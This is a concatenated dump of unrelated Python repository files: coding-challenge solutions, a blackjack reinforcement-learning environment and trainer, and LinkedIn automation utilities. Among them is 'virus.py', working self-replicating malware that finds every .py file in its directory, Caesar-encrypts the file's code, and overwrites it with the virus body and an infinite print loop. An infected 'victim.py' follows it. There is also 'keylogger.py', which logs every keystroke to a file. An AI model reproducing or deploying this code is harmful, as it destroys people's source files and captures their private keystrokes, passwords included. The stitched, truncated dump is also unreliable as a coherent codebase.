#### File: CodingChallenges/python3/unique_paths_obs.py
```python
class Solution:
def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:
row = len(obstacleGrid)
col = len(obstacleGrid[0])
if (row == 1 and col == 1) and obstacleGrid[row-1][col-1] == 1:
return 0
if obstacleGrid[row-1][col-1] == 1:
return 0
# change obs to -1
for y in range(row):
for x in range(col):
if obstacleGrid[y][x] == 1:
obstacleGrid[y][x] = -1
for i in range(row):
for j in range(col):
if obstacleGrid[i][j] == 0:
if i == 0 and j == 0:
obstacleGrid[i][j] = 1
elif i == 0:
left = obstacleGrid[i][j-1] if obstacleGrid[i][j-1] != -1 else 0
obstacleGrid[i][j] = left
elif j == 0:
top = obstacleGrid[i-1][j] if obstacleGrid[i-1][j] != -1 else 0
obstacleGrid[i][j] = top
else:
top = obstacleGrid[i-1][j]
left = obstacleGrid[i][j-1]
if top == -1:
top = 0
if left == -1:
left = 0
obstacleGrid[i][j] = top + left
print(obstacleGrid)
return obstacleGrid[row-1][col-1] if obstacleGrid[row-1][col-1] != -1 else 0
```
#### File: CodingChallenges/python3/unique_paths.py
```python
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
grid = []
for _ in range(n):
grid.append([0]*m)
for row in range(n):
for col in range(m):
if row == 0:
grid[row][col] = 1
elif col == 0:
grid[row][col] = 1
else:
grid[row][col] = grid[row-1][col] + grid[row][col-1]
return grid[n-1][m-1]
```
#### File: CodingChallenges/python3/valid_anagram.py
```python
class Solution:
def isAnagram(self, s: str, t: str) -> bool:
s = sorted(s)
t = sorted(t)
return s == t
```
#### File: CodingChallenges/python3/validate_stack_sequences.py
```python
class Solution:
def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:
n = len(pushed)
stack = []
i, j = 0, 0
while i < n or stack:
if stack and stack[-1] == popped[j]:
stack.pop()
j += 1
elif i < n:
stack.append(pushed[i])
i += 1
else:
return False
return True
```
#### File: CodingChallenges/python3/valid_palindrome.py
```python
class Solution:
def isPalindrome(self, s: str) -> bool:
s_cp = s.replace(" ", "").lower()
clean_s = ''
for l in s_cp:
# check if num
if ord(l) >= 48 and ord(l) <= 57:
clean_s += l
elif ord(l) >= 97 and ord(l) <= 122:
clean_s += l
return clean_s == clean_s[::-1]
```
#### File: CodingChallenges/python3/vowel_cons_anagram.py
```python
def get_factorial(n):
res = 1
for i in range(1, n+1):
res *= i
return res
def get_con_div(hashmap):
res = 1
for key, val in hashmap.items():
if key not in ['A', 'E', 'I', 'O', 'U']:
res *= get_factorial(val)
return res
def get_vow_div(hashmap):
res = 1
for key, val in hashmap.items():
if key in ['A', 'E', 'I', 'O', 'U']:
res *= get_factorial(val)
return res
def solution(S):
vow = 0
con = 0
hashmap = {}
for l in S:
if l in ['A', 'E', 'I', 'O', 'U']:
vow += 1
else:
con += 1
if l not in hashmap:
hashmap[l] = 1
else:
hashmap[l] += 1
if con - vow not in [0, 1]:
return 0
# print(vow, con, hashmap)
res_con = (get_factorial(con)) / get_con_div(hashmap)
res_vow = (get_factorial(vow)) / get_vow_div(hashmap)
return int(res_con * res_vow) % 1000000007
res = solution("BOLOBOLO")
print("res : {}".format(res))
``` |
{
"source": "joshiarheinier/pyscript",
"score": 3
} |
#### File: pyscript/simple-virus-script/victim.py
```python
def prankPrint():
while True:
print(";slvrBlt;")
prankPrint()
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
ghi wublqj(d):
iru l lq udqjh(d):
blhog l+3
d=wublqj(5)
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
def trying(a):
for i in range(a):
yield i+3
a=trying(5)
```
#### File: pyscript/simple-virus-script/virus.py
```python
def prankPrint(): #Make the 'injected stamp' function
while True:
print(";slvrBlt;")
#damned
import glob
from string import *
target = glob.glob("*.py") #Search for other python script
for each in target:
host = open(each,'r')
hostcode = host.read()
if hostcode.find(";slvrBlt;") == -1:
vir_str = ''
for string in hostcode: #Create the virus by crypting/changing its text
if 64< ord(string) < 120:
encrypt = chr(ord(string)+3)
elif 119 < ord(string) < 123:
encrypt = chr(ord(string)+3-26)
else: encrypt = string
vir_str += encrypt
host = open(each,'w')
virus = open(__file__,'r')
tmp = virus.read()
tmp = tmp[:tmp.find("#damned")]+'prankPrint()'
mybody = tmp+chr(10)+vir_str+chr(10)+hostcode
virus.close()
host.write(mybody) #injecting the virus
``` |
{
"source": "joshiarheinier/Python-Keylogger-Linux-",
"score": 3
} |
#### File: joshiarheinier/Python-Keylogger-Linux-/keylogger.py
```python
import pyxhook
#this function is called everytime a key is pressed.
#for every key pressed, it will be recorded to a text file
#named record.log (You can edit the name and its directory)
recordfile = "record.log"
def OnKeyPress(event):
recordKey = open(recordfile,"a")
if event.Ascii==32: #32 is the ascii value of space
recordKey.write(" ")
elif event.Ascii==13: #10 is the ascii value of <Return>
recordKey.write("\n")
elif event.Ascii==96: #96 is the ascii value of the grave key (`)
hook.cancel()
else:
recordKey.write(event.Key)
recordKey.close()
#initiate HookManager class
hook=pyxhook.HookManager()
#listen to all keys pressed
hook.KeyDown=OnKeyPress
#hook the keyboard
hook.HookKeyboard()
#start the keylogging
hook.start()
``` |
{
"source": "joshiatul/game_playing",
"score": 4
} |
#### File: game_playing/environments/blackjack.py
```python
import random
from collections import namedtuple
from . import environment
import os
# TODO Resolve for information <===> state.. unneccessary confusion
class BlackJack(environment.AbstractGame):
def __init__(self):
self.action_space = ['hit', 'stay']
super(BlackJack, self).__init__('blackjack')
def print_game_status(self):
if self.decision:
print "player decided to: " + self.decision
print "player_hand: " + str(self.player_hand) + " with value: " + str(self.player_value)
print "dealer_hand: " + str(self.dealer_hand) + " with value: " + str(self.dealer_value)
print self.game_status
@staticmethod
def random_card():
"""
Ace (1), 2, 3, 4, 5, 6, 7, 8, 9, 10, Jack (10), Queen (10), King (10)
Ace can have value of 1 or 10 based on if other card values < 10
:return: random card
"""
card = random.randint(1, 13)
if card > 10:
return 10
return card
@staticmethod
def reevaluate_value(hand):
"""
This is assuming when to use usable_ace
Ideally an algorithm should also learn this
along with when to 'hit' and 'stay'
"""
val = sum(hand)
if 1 in hand and val <= 11:
return val + 10
else:
return val
def add_card_to_player(self, card):
# card = random.choice([2,3,4,9,10])
#card = random.choice([10])
self.player_hand.extend([card])
self.player_value = self.reevaluate_value(self.player_hand)
def add_card_to_dealer(self, card):
# card = random.choice([9,8,3,2,4,5,6,1,7])
# card = random.choice([9, 2])
self.dealer_hand.extend([card])
self.dealer_value = self.reevaluate_value(self.dealer_hand)
def evaluate_game(self, decision=False):
"""
:return: status
"""
status = 'in process'
reward = False
if not decision:
if self.player_value == 21:
if self.dealer_value != 21:
status = 'player wins'
else:
status = 'draw'
if decision == 'stay':
if (self.dealer_value > 21):
status = 'dealer busts and player wins'
elif self.dealer_value == self.player_value:
status = 'draw'
elif self.dealer_value < self.player_value:
status = 'player wins'
elif self.dealer_value > self.player_value:
status = 'player loses'
if decision == 'hit':
if self.player_value == 21:
if self.dealer_value != 21:
status = 'player wins'
else:
status = 'draw'
elif self.player_value > 21:
status = 'player busts and loses'
elif self.player_value < 21:
status = 'in process'
# # win = 5, draw = 2, lose = 1
if status in ['player wins', 'dealer busts and player wins']:
reward = 1
elif status == 'draw':
reward = 0
elif status in ['player loses', 'player busts and loses']:
reward = -1
return status, reward
def reset(self):
self.player_hand = []
self.dealer_hand = []
self.player_value = 0
self.dealer_value = 0
self.game_status = ''
self.decision = ''
self.state = ()
self.state_info = namedtuple('state_info', ['player_value', 'dealer_value'])
self.information = None
# Player gets two cards
self.add_card_to_player(self.random_card())
self.add_card_to_player(self.random_card())
# Let's always hit if card total < 11
while self.player_value <= 11:
self.add_card_to_player(self.random_card())
# Dealer opens a single card
self.add_card_to_dealer(self.random_card())
# This card is really hidden from the player
# self.add_card_to_dealer(self.random_card())
status, reward = self.evaluate_game()
self.game_status = status
#self.state = self.state_info(self.player_value, self.dealer_value)
self.state = tuple('-'.join([i, str(j)]) for i, j in zip(self.state._fields, self.state))
#self.information = self.state_info(self.player_value, self.dealer_value)
return
def evaluate_dealer(self):
"""
If player decides to stay:
the dealer always follows this policy: hit until cards sum to 17 or more, then stay.
:return:
"""
while self.dealer_value < 17:
self.add_card_to_dealer(self.random_card())
def step(self, decision):
self.decision = decision
if decision == 'stay':
# Evaluate game, dealer plays
self.evaluate_dealer()
status, reward = self.evaluate_game(decision)
if decision == 'hit':
# If hit, add new card to player's hand
self.add_card_to_player(self.random_card())
status, reward = self.evaluate_game(decision)
self.game_status = status
#self.state = self.state_info(self.player_value, self.dealer_value)
self.state = tuple(('-'.join([i, str(j)]) for i, j in zip(self.state._fields, self.state)))
#self.information = self.state_info(self.player_value, self.dealer_value)
# Needs to return <observation, reward, done, info>
done = True if self.game_status != 'in process' else False
return self.state, reward, done, []
def complete_one_episode(self, banditAlgorithm, model=None):
all_decision_states = []
while self.game_status == 'in process':
# self.print_game_status()
state = self.state_info(self.player_value, self.dealer_value)
decision, prob = banditAlgorithm.select_decision_given_state(state, self.action_space, model=model, algorithm='epsilon-greedy')
# Only terminal state returns a valid reward
# Needs to return <observation, reward, done, info> gym compatible
observation, reward, done, info = self.step(decision)
all_decision_states.append((state, decision))
all_decision_states_tuple = tuple(all_decision_states)
return all_decision_states_tuple, reward
```
#### File: joshiatul/game_playing/rl_learning.py
```python
from model import Model
import bandits
import random
import time
import cPickle as pickle
from collections import Counter, deque
import numpy as np
import os
from environments.environment import Environment
import threading
import multiprocessing
from multiprocessing.managers import BaseManager
from itertools import izip
# http://stackoverflow.com/questions/26499548/accessing-an-attribute-of-a-multiprocessing-proxy-of-a-class
# http://stackoverflow.com/questions/28612412/how-can-i-share-a-class-between-processes-in-python
def play_with_environment(environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id=1,
train=True, display_state=False):
"""
Simple temporal difference learning
with experience-replay
:return:
"""
env = make_environment(environment_params)
epsilon = bandit_params.get('start_epsilon', 0.9)
end_epsilon = bandits.sample_end_epsilon()
model_class = 'random' if not model else model.return_model_class()
X, y = [], []
if train and rl_params.get('memory_structure', 'asynchronus_methods') == 'experience_replay':
experience_replay_obs = ExperienceReplay(type='deque',
batchsize=rl_params['memory_structure_params']['batchsize'],
experience_replay_size=rl_params['memory_structure_params'][
'experience_replay_size'],
minibatch_method=rl_params['memory_structure_params'][
'minibatch_method'])
if train:
print "------ Starting thread: " + str(thread_id) + " with final epsilon ", end_epsilon
time.sleep(3 * thread_id)
for episode in xrange(1, epochs + 1):
if not train and display_state: print "Game #-----: " + str(episode)
# Initialize game and per episode counters
current_state = env.reset()
total_episodic_reward = 0
episodic_max_q = 0
if train and model.if_exists():
epsilon = bandits.decrement_epsilon(epochs, epsilon, bandit_params.get('anneal_epsilon_timesteps', 10000),
end_epsilon)
# Start playing the game
for move in xrange(1, rl_params['max_steps'] + 1):
if display_state: env.render()
episodic_rewards = []
states = []
# Look n step ahead
for _ in xrange(rl_params.get('n_steps_ahead', 1)):
# Figure out best action based on policy
action, max_q_value = bandits.select_action_with_epsilon_greedy_policy(current_state, env.action_space,
model,
epsilon=epsilon, test=not train)
# Take step / observe reward / preprocess / update counters
if not train and display_state: print "Taking action: #-----: " + str(action)
new_state, reward, done, info = env.step(action)
clipped_reward = env.clip_reward(reward, done)
episodic_rewards.append(clipped_reward)
states.append(current_state)
total_episodic_reward += reward
td_error = clipped_reward - max_q_value
episodic_max_q += max_q_value
# Update state
current_state = new_state
if done:
break
if train:
bootstrapped_reward = return_bootstrapped_reward(env, model, new_state, done)
for i in xrange(len(episodic_rewards) - 1, -1, -1):
bootstrapped_reward = episodic_rewards[i] + rl_params['gamma'] * bootstrapped_reward
if rl_params['memory_structure'] == 'experience_replay':
X, y = generate_training_samples_with_experience_replay(experience_replay_obs, env, model, X, y,
episode_key=(episode, move),
gamma=rl_params['gamma'],
state_tuple=(
states[i], action,
bootstrapped_reward, new_state,
done, episode,
move, td_error))
else:
X_new, y_new = model.return_design_matrix((states[i], action), bootstrapped_reward, weight=1)
X.append(X_new)
y.append(y_new)
# Train model and reset design matrix
model.fit(X, y)
X, y = [], []
# Check game status and break if you have a result (printing only makes sense for gridworld)
if done:
if not train and display_state and clipped_reward > 0: print 'Player WINS!'
if not train and display_state and clipped_reward < 0: print 'Player LOSES!'
break
# Record end of the episode statistics
statistics.record_episodic_statistics(done, episode, move, clipped_reward, total_episodic_reward,
episodic_max_q,
epsilon=epsilon, train=train, model_class=model_class,
thread_id=thread_id)
# if train:
# if thread_id == 4 and episode % 2000 == 0 and episode != epochs:
# print "Saving model and continuing------------------"
# model.save_and_continue()
if not train:
statistics.calculate_summary_statistics(model)
return statistics.result
else:
print "------ Finishing thread: " + str(thread_id) + " -------------------------"
def return_bootstrapped_reward(env, model, new_state, done):
if not done and model.if_exists(): # non-terminal state
# Get value estimate for that best action and update EXISTING reward
max_q_action, max_q_value = bandits.return_action_based_on_greedy_policy(new_state, model, env.action_space)
else:
max_q_value = 0
return max_q_value
class Statistics(object):
def __init__(self, base_folder_name, test):
self.total_reward = 0
self.total_steps = 0
self.total_episodes = 0
self.result_file = open(base_folder_name + '/result.data', 'w') if not test else None
self.result = {}
self.batch_mse_stat = []
def record_episodic_statistics(self, done, episode, total_moves, step_reward, total_episodic_reward, episodic_max_q,
epsilon, train=True,
model_class=None, thread_id=1):
"""
For now record statistics only if episode is ended OR max steps are done
"""
avg_max_q = episodic_max_q * 1.0 / total_moves
res_line = 'Episode:{0}, total_steps:{1}, total_reward:{2}, final_reward:{3}, avg_q_value:{4}, epsilon:{5}, thread:{6}'.format(
episode,
total_moves,
total_episodic_reward,
round(step_reward, 4),
round(episodic_max_q),
round(epsilon, 4),
thread_id)
if train:
# print res_line
self.result_file.write(res_line + "\n")
self.total_reward = total_episodic_reward
self.total_episodes = episode
model_type = 'random' if not model_class else model_class
if model_type not in self.result:
self.result[model_type] = Counter()
if done:
if total_episodic_reward > 0:
self.result[model_type]['player wins'] += 1
else:
self.result[model_type]['player loses'] += 1
else:
self.result[model_type]['in process'] += 1
def calculate_summary_statistics(self, model_class=None):
model_type = 'random' if not model_class else model_class
if model_type in self.result:
self.result[model_type]['avgerage_reward_per_episode'] = round(
self.total_reward * 1.0 / max(self.total_episodes, 1), 2)
self.total_reward = 0
self.total_episodes = 0
try:
self.result_file.close()
except:
pass
class ModelManager(BaseManager):
pass
def train_with_threads(environment_params, rl_params, bandit_params, model_params, epochs, num_of_threads, train=True,
display_state=False, use_processes=False):
start_time = time.time()
# Initialize statistics and model here and pass it as an argument
test = not train
model_params['base_folder_name'] = return_base_path(environment_params['env_name'])
model_params['actor_critic_model'] = rl_params['memory_structure_params'].get('actor_critic_method', False)
statistics = Statistics(base_folder_name=model_params['base_folder_name'], test=test)
env_name = 'non_atari' if environment_params['env_name'] == 'gridworld' else 'atari'
resume = model_params.get('resume', False)
if not use_processes:
model = Model(model_params)
model.initialize(test, resume)
actor_learner_threads = [
threading.Thread(target=play_with_environment_pong if env_name == 'atari' else play_with_environment, args=(
environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id, train, display_state))
for
thread_id in xrange(1, num_of_threads + 1)]
# Multiprocessing process
else:
# We will need to register Model class if we want to share model object
ModelManager.register('Model', Model)
manager = ModelManager()
manager.start()
model = manager.Model(model_params)
model.initialize(test, resume)
actor_learner_threads = [
multiprocessing.Process(target=play_with_environment_pong if env_name == 'atari' else play_with_environment,
args=(
environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id,
train, display_state)) for
thread_id in xrange(1, num_of_threads + 1)]
for t in actor_learner_threads:
t.start()
for t in actor_learner_threads:
t.join()
if train: model.finish()
# statistics.calculate_summary_statistics(model.return_model_class())
print "elapsed time:" + str(int(time.time() - start_time))
# return statistics.result
def return_base_path(name):
directory = os.path.dirname(os.path.realpath(__file__)) + '/solved_environments/' + name
if not os.path.exists(directory):
os.makedirs(directory)
return directory
def make_environment(environment_params):
if environment_params['env_name'] == 'gridworld':
from environments.gridworld import GridWorld
env = GridWorld(environment_params['grid_size'])
else:
env = Environment(environment_params['env_name'], grid_size=environment_params['grid_size'],
last_n=environment_params['last_n'],
delta_preprocessing=environment_params['delta_preprocessing'])
return env
def test_trained_model_with_random_play(environment_params, test_games, render=False):
print "---------- Testing policy:-----------"
base_folder = return_base_path(environment_params['env_name'])
model = pickle.load(open(base_folder + '/model_obs.pkl', mode='rb'))
model.initialize(test=True)
statistics = Statistics(base_folder_name=base_folder, test=True)
# First test with trained model
print "---------- Testing trained VW model -------"
if environment_params['env_name'] == 'gridworld':
play_with_environment(environment_params, model, statistics, rl_params={'max_steps': 30}, bandit_params={},
epochs=test_games, train=False, display_state=render)
else:
play_with_environment_pong(environment_params, model, statistics, rl_params={},
bandit_params={'start_epsilon': 0.0}, epochs=test_games, thread_id=8, train=False,
display_state=True)
# Now with random model
print "---------- Testing Random model -----------"
model = None
if environment_params['env_name'] == 'gridworld':
play_with_environment(environment_params, model, statistics, rl_params={'max_steps': 30}, bandit_params={},
epochs=test_games, train=False, display_state=False)
else:
play_with_environment_pong(environment_params, model, statistics, rl_params={}, bandit_params={},
epochs=test_games, thread_id=1, train=False,
display_state=render)
return statistics.result
# ------- Pong functions TEST ------------------------------------------------------
def choose_action_greedy_policy(current_sparse_state, model, action_space):
q_value_table = []
for a in action_space:
fv = current_sparse_state + " |decision action_" + str(a)
q_value_table.append(model.predict(fv))
max_value = max(q_value_table)
max_index = q_value_table.index(max_value)
return action_space[max_index]
def play_with_environment_pong(environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id,
train=True, display_state=False):
gamma = rl_params.get('gamma', 0.99) # discount factor for reward
model_trained = False if train or not model else True
epsilon = bandit_params.get('start_epsilon', 0.5)
np.random.seed(0)
end_epsilon = bandits.sample_end_epsilon()
anneal_epsilon_timesteps = bandit_params.get('anneal_epsilon_timesteps', 2000)
env = make_environment(environment_params)
# env.env.seed(1)
xs, drs, dm = [], [], []
running_reward = None
for episode_number in xrange(1, epochs + 1):
reward_sum = 0
observation = env.reset() # reset env
current_sparse_state = env.preprocess_and_sparsify(observation)
for _ in xrange(10000):
if display_state:
time.sleep(0.01)
env.render()
# Based on epsilon-greedy choose action
if model_trained:
if np.random.random() > epsilon:
action = choose_action_greedy_policy(current_sparse_state, model, env.action_space)
else:
action = np.random.choice(env.action_space)
else:
action = np.random.choice(env.action_space)
# record state (per vw sparse representation)
xs.append(current_sparse_state + " |decision action_" + str(action))
# step the environment and get new measurements
observation, reward, done, info = env.step(action)
reward_sum += reward
# record reward (has to be done after we call step() to get reward for previous action)
drs.append(reward)
# re-compute current_sparse_state
current_sparse_state = env.preprocess_and_sparsify(observation)
if reward != 0:
running_add = 0
for iw, fv in izip(reversed(drs), reversed(xs)):
running_add = running_add * gamma * 1.0 + iw
pos_fv = str(running_add) + " " + fv
dm.append(pos_fv)
if train:
model.fit(dm, y=[])
model_trained = True
xs, drs, dm = [], [], [] # reset array memory
if done: # an episode finished
if epsilon > end_epsilon:
epsilon -= ((1.0 - end_epsilon) / anneal_epsilon_timesteps)
epsilon = max(epsilon, end_epsilon)
# Keep track of running reward
running_reward = reward_sum if running_reward is None else running_reward * 0.99 + reward_sum * 0.01
if train:
model.compute_running_reward(episode_number, thread_id, reward_sum, running_reward, epsilon)
else:
print 'Episode: %d resetting env. episode reward total was %f. running mean: %f' % (
episode_number, reward_sum, running_reward)
statistics.record_episodic_statistics(done, episode=episode_number, total_moves=_,
step_reward=reward_sum, total_episodic_reward=running_reward,
episodic_max_q=running_reward,
epsilon=epsilon, train=train, model_class='async',
thread_id=thread_id)
break
# -------------- Experience-replay Class and Methods --------------------------------------------------
class ExperienceReplay(object):
def __init__(self, type, batchsize, experience_replay_size, minibatch_method='random'):
self.type = type
self.experience_replay_size = experience_replay_size
self.minibatch_method = minibatch_method
self.experience_replay = None
self.batchsize = batchsize
self.all_indices = range(experience_replay_size)
# For stratified sampling
self.positive_sample_fraction = 0.1
self.positive_batchsize = int(self.batchsize * self.positive_sample_fraction)
self.negative_batchsize = self.batchsize - self.positive_batchsize
self.experience_replay_positive = None
self.experience_replay_negative = None
self.positive_indices = range(int(experience_replay_size * self.positive_sample_fraction))
self.negative_indices = range(int(experience_replay_size * (1 - self.positive_sample_fraction)))
self.max_positive_idx = None
self.initialize()
def initialize(self):
if self.type == 'deque':
self.experience_replay = deque(maxlen=self.experience_replay_size)
pos_size = int(self.experience_replay_size * self.positive_sample_fraction)
self.experience_replay_positive = deque(maxlen=pos_size)
neg_size = self.experience_replay_size - pos_size
self.experience_replay_negative = deque(maxlen=neg_size)
# elif self.type == 'dict':
# # {(episode, move): state_action_reward_tuple}
# self.experience_replay = OrderedDict()
def store_for_experience_replay(self, state_tuple, episode_move_key=None):
old_state, best_known_decision, cumu_reward, new_state, done, episode, move, td_error = state_tuple
if len(old_state) > 0 and len(new_state) > 0:
if self.type == 'deque':
if self.minibatch_method != 'stratified':
self.experience_replay.appendleft(state_tuple)
else:
if cumu_reward > 0:
self.experience_replay_positive.appendleft(state_tuple)
else:
self.experience_replay_negative.appendleft(state_tuple)
# elif self.type == 'dict' and episode_move_key:
# if len(self.experience_replay) == self.experience_replay_size:
# _ = self.experience_replay.popitem(last=False)
# self.experience_replay[episode_move_key] = state_tuple
def return_minibatch(self):
if self.minibatch_method == 'random':
if self.type == 'deque':
minibatch_indices = random.sample(self.all_indices, self.batchsize)
# elif self.type == 'dict':
# minibatch_indices = random.sample(self.experience_replay.keys(), self.batchsize)
# Only work with deque type
elif self.minibatch_method == 'prioritized':
# Simple prioritization based on magnitude of reward
total_reward_in_ex_replay = sum(
max(abs(st[7]), (1.0 / self.experience_replay_size)) for st in self.experience_replay)
probs = tuple(
(max(abs(st[7]), (1.0 / self.experience_replay_size)) * 1.0 / total_reward_in_ex_replay for st in
self.experience_replay))
minibatch_indices = list(np.random.choice(self.all_indices, self.batchsize, probs))
# Only work with deque type
elif self.minibatch_method == 'stratified':
if len(self.experience_replay_positive) >= self.positive_batchsize:
minibatch_indices_positive = random.sample(self.positive_indices, self.positive_batchsize)
else:
minibatch_indices_positive = self.positive_indices
minibatch_indices_negative = random.sample(self.negative_indices, self.negative_batchsize)
# First positive indices and then negative indices - keep track of this
minibatch_indices = minibatch_indices_positive + minibatch_indices_negative
self.max_positive_idx = len(minibatch_indices_positive)
return minibatch_indices
def return_minibatch_sample(self, index, count=None):
if self.minibatch_method == 'random' or self.minibatch_method == 'prioritized':
result = self.experience_replay[index]
elif self.minibatch_method == 'stratified':
try:
if count < self.max_positive_idx:
result = self.experience_replay_positive[index]
else:
result = self.experience_replay_negative[index]
except Exception as e:
print e
return result
def start_training(self):
"""
Start training only if experience replay memory is full
"""
if self.minibatch_method == 'random' or self.minibatch_method == 'prioritized':
start = False if len(self.experience_replay) < self.experience_replay_size else True
elif self.minibatch_method == 'stratified':
start = False if len(self.experience_replay_positive) + len(
self.experience_replay_negative) < self.experience_replay_size else True
return start
def generate_training_samples_with_experience_replay(experience_replay_obs, env, model, X, y, episode_key, gamma,
state_tuple):
experience_replay_obs.store_for_experience_replay(state_tuple, episode_key)
# Start training only after buffer is full
if experience_replay_obs.start_training():
# randomly sample our experience replay memory
minibatch = experience_replay_obs.return_minibatch()
# Now for each gameplay experience, update current reward based on the future reward (using action given by the model)
for idx, index in enumerate(minibatch):
example = experience_replay_obs.return_minibatch_sample(index, count=idx)
current_state, action, bootstrapped_reward, new_state, done, episode, move, td_error = example
X_new, y_new = model.return_design_matrix((current_state, action), bootstrapped_reward, weight=1)
X.append(X_new)
y.append(y_new)
return X, y
``` |
{
"source": "JoshiAyush/LinkedIn-Automator",
"score": 2
} |
#### File: lib/utils/net.py
```python
from typing import List
import platform
import subprocess
def ping(host: str = None) -> bool:
"""Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host
name is valid.
We avoid 'os.system' calls with 'subprocess.call' to avoid shell injection
vulnerability.
:Args:
- host: {str} Hostname.
:Returns:
- {bool} True if server responds, false otherwise.
"""
if not host:
host = "google.com"
if platform.system().lower() == "windows":
param = "-n"
else:
param = "-c"
command: List[str] = ["ping", param, '1', host]
return subprocess.call(command, stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) == 0
```
#### File: lib/utils/type.py
```python
from __future__ import annotations
from typing import Any
def _type(t: Any) -> str:
"""Function _type() returns the class name of the object given.
:Args:
- t: {Any} Object we need to find the class name for.
:Returns:
- {str} Class name if __name__ attribute is present otherwise None.
"""
try:
return t.__name__
except AttributeError:
return None
"""Function is_int() returns True if the instance given is an int.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is an int otherwise False.
"""
is_int: function = lambda field: isinstance(field, int)
"""Function is_str() returns True if the instance given is an str.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is an str otherwise False.
"""
is_str: function = lambda field: isinstance(field, str)
"""Function is_list() returns True if the instance given is an list.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is an list otherwise False.
"""
is_list: function = lambda field: isinstance(field, list)
"""Function is_none() returns True if the instance given is None.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is None otherwise False.
"""
is_none: function = lambda field: field is None
def is_empty(field: str) -> bool:
"""Function is_empty() returns True if the instance given is empty.
:Args:
- field: {str} Instance.
:Returns:
- {bool} True if the given instance is empty otherwise False.
"""
if is_str(field):
return field.strip() == ''
return False
def is_present(obj: Any, field: Any) -> bool:
"""Function is_present() returns True if the instance given contains the obj.
:Args:
- field: {Any} Instance.
- obj: {Any} Instance to find.
:Returns:
- {bool} True if the instance given contains obj otherwise False.
"""
if not is_int(field):
return obj in field
return False
```
#### File: linkedin/message/template.py
```python
from __future__ import annotations
from typing import Dict
import os
import json
import random
import datetime
from errors import (
TemplateFileException,
TemplateFileNotSupportedException,
TemplateMessageLengthExceededException,
)
MY_NAMES = [
'{{my_name}}', '{{my_first_name}}', '{{my_last_name}}',
'{{my_company_name}}', '{{my_position}}', ]
NAMES = [
'{{name}}', '{{first_name}}', '{{last_name}}',
'{{current_company}}', *MY_NAMES, ]
OTHERS = [
'{{keyword}}', '{{location}}', '{{industry}}', '{{title}}',
'{{school}}', '{{profile_language}}', '{{my_position}}',
'{{position}}', '{{year}}', ]
SUPPORTED_TEMP_FILES = ['.txt', ]
DEFAULT_LANG = 'en-US'
VAR_BEGN_BLK = 'VARIABLE BEGIN:'
VAR_END_BLK = 'VARIABLE END;'
TEMPL_BEGN_BLK = 'TEMPLATE BEGIN:'
TEMPL_END_BLK = 'TEMPLATE END;'
TEMPL_AVAIL = [
'template_business', 'template_sales', 'template_real_estate',
'template_creative_industry', 'template_hr', 'template_include_industry',
'template_ben_franklin', 'template_virtual_coffee',
'template_common_connection_request', ]
TEMPL_FILE_PATH = os.path.join(os.path.abspath(__file__)[0:os.path.abspath(__file__).find('template.py'):], 'templates.json')
class Template:
def __init__(
self: Template, message_template: str,
*, var_template: str, grammar_check: bool = True,
use_template: str = None) -> None:
if message_template is None:
if use_template is None:
return
else:
self._message = self.get_template_by_name(use_template)
if use_template == 'template_common_connection_request':
self._message = random.choice(self._message)
elif os.path.isfile(message_template):
self._message = self.load_message(message_template)
else:
self._message = message_template
self.var_template = var_template
self._enable_language_tool = grammar_check
if self._enable_language_tool:
import language_tool_python
self._language_tool = language_tool_python.LanguageTool(
language=DEFAULT_LANG)
@staticmethod
def get_template_by_name(name: str) -> str:
if not name in TEMPL_AVAIL:
raise TemplateFileException(
f"Invalid template! Use any of these {TEMPL_AVAIL}")
else:
with open(TEMPL_FILE_PATH, 'r') as templ_file:
data = json.load(templ_file)
return data[name]
def set_data(self: Template, data: Dict[str, str]) -> None:
self._data = {}
self._data = {**self._data, **{'{{name}}': data.pop('name', None)}}
self._data = {**self._data, **{'{{first_name}}': data.pop('first_name', None)}}
self._data = {**self._data, **{'{{last_name}}': data.pop('last_name', None)}}
self._data = {**self._data, **{'{{keyword}}': data.pop('keyword', None)}}
self._data = {**self._data, **{'{{location}}': data.pop('location', None)}}
self._data = {**self._data, **{'{{industry}}': data.pop('industry', None)}}
self._data = {**self._data, **{'{{title}}': data.pop('title', None)}}
self._data = {**self._data, **{'{{school}}': data.pop('school', None)}}
self._data = {**self._data, **{'{{current_company}}': data.pop('current_company', None)}}
self._data = {**self._data, **{'{{profile_language}}': data.pop('profile_language', None)}}
self._data = {**self._data, **{'{{position}}': data.pop('position', None)}}
self._data = {**self._data, **{'{{year}}': data.pop('year', str(datetime.datetime.now().year))}}
if self.var_template is not None and os.path.isfile(self.var_template):
self.load_variable(self.var_template)
@staticmethod
def check_if_file_is_supported(path: str) -> bool:
unmatched_temp_files_count = 0
for ext in SUPPORTED_TEMP_FILES:
if not path.endswith(ext):
unmatched_temp_files_count += 1
else:
break
if unmatched_temp_files_count == len(SUPPORTED_TEMP_FILES):
return False
return True
@staticmethod
def load_message(path: str) -> str:
if Template.check_if_file_is_supported(path) is False:
raise TemplateFileNotSupportedException(
'Template file %(file)s is not supported!' %
